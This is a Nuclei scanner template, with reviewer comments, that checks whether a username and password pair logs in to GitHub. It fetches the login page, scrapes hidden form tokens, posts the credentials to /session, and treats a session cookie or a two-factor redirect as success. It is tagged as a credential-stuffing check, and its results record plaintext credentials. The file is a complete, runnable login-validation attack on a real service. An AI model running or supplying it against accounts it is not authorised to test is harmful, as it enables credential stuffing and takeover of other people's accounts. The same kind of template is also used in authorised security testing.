漏洞描述
Checks whether a supplied username and password are accepted by the GitHub login form.
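# Nuclei HTTP template: tests whether a supplied username/password pair is
# accepted by the GitHub web login form.
#
# Flow: request 1 loads the login page and the extractors pull the form's
# hidden values out of the HTML; request 2 posts those values together with
# the credentials to /session. `username` and `password` are referenced but
# not defined in this file, so they have to be supplied at run time.
#
# Server-side, each tested pair shows up as a GET /login followed by a
# POST /session.
#
# NOTE(review): the trailing `# digest:` comment signs the upstream file
# content. Any edit to the template, comments included, invalidates it, so
# the file needs re-signing before it loads as verified.
id: github-login-check

info:
  name: Github Login Check
  author: parthmalhotra,pdresearch
  # NOTE(review): "critical" presumably rates the impact of a confirmed valid
  # credential pair; the template does not test for a flaw in GitHub itself.
  severity: critical
  description: Checks for a valid github account.
  reference:
    - https://owasp.org/www-community/attacks/Credential_stuffing
  metadata:
    max-request: 2
  tags: cloud,creds-stuffing,login-check,github,vuln

# Both requests carry absolute URLs; no target is taken from the input list.
self-contained: true

http:
  - raw:
      # Request 1: fetch the login form so its hidden values can be extracted.
      - |
        GET https://github.com/login HTTP/1.1
        Host: github.com

      # Request 2: submit the form. The blank line separates the headers from
      # the urlencoded body. `&timestamp=` and `&timestamp_secret=` are
      # written out in full: a rendering that decodes `&times` as an HTML
      # entity turns them into `×tamp` and drops both parameters.
      # NOTE(review): `required_field_34b7` is a fixed name here; if the form
      # generates that name per render the POST fails regardless of the
      # credentials. Confirm against the live form.
      - |
        POST https://github.com/session HTTP/1.1
        Host: github.com
        Origin: https://github.com
        Content-Type: application/x-www-form-urlencoded
        Referer: https://github.com/login

        commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=&timestamp={{timestamp}}&timestamp_secret={{timestamp_secret}}

    extractors:
      # The three internal extractors read the `value` attribute of hidden
      # form inputs from a response body and feed request 2. The XPaths are
      # absolute and positional, so a layout change leaves the variables
      # empty and the login is rejected whatever the credentials are:
      # "no match" is not evidence that a credential pair is invalid.
      - type: xpath
        name: authenticity_token
        part: body
        attribute: value
        internal: true
        xpath:
          - /html/body/div[3]/main/div/div[4]/form/input[1]

      - type: xpath
        name: timestamp
        part: body
        attribute: value
        internal: true
        xpath:
          - /html/body/div[3]/main/div/div[4]/form/div/input[10]

      - type: xpath
        name: timestamp_secret
        part: body
        attribute: value
        internal: true
        xpath:
          - /html/body/div[3]/main/div/div[4]/form/div/input[11]

      # Not internal: the tested username and password are printed with each
      # result, so result files contain plaintext credentials.
      - type: dsl
        dsl:
          - username
          - password

    # Either matcher alone reports the pair as valid.
    matchers-condition: or
    matchers:
      # 302 redirect to the two-factor page; presumably the password was
      # accepted and only the second factor is outstanding.
      - type: dsl
        name: 2fa
        dsl:
          - "contains(location, 'https://github.com/sessions/two-factor')"
          - "status_code==302"
        condition: and

      # 302 redirect that sets both the logged_in=yes and user_session
      # cookies, i.e. a session was issued without a further step.
      - type: dsl
        dsl:
          - "contains(to_lower(header), 'set-cookie: logged_in=yes')"
          - "contains(to_lower(header), 'set-cookie: user_session=')"
          - "status_code==302"
        condition: and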
# digest: 4a0a0047304502206877f036ee535cec118c15201dbd592497509ca61d0f654831a390fcfa1f7d7b022100a66280afce3ac4050744ea5290300a98b872bdf0bbb78c9bd03df695598ffe53:922c64590222798bb761d5b6d8e72950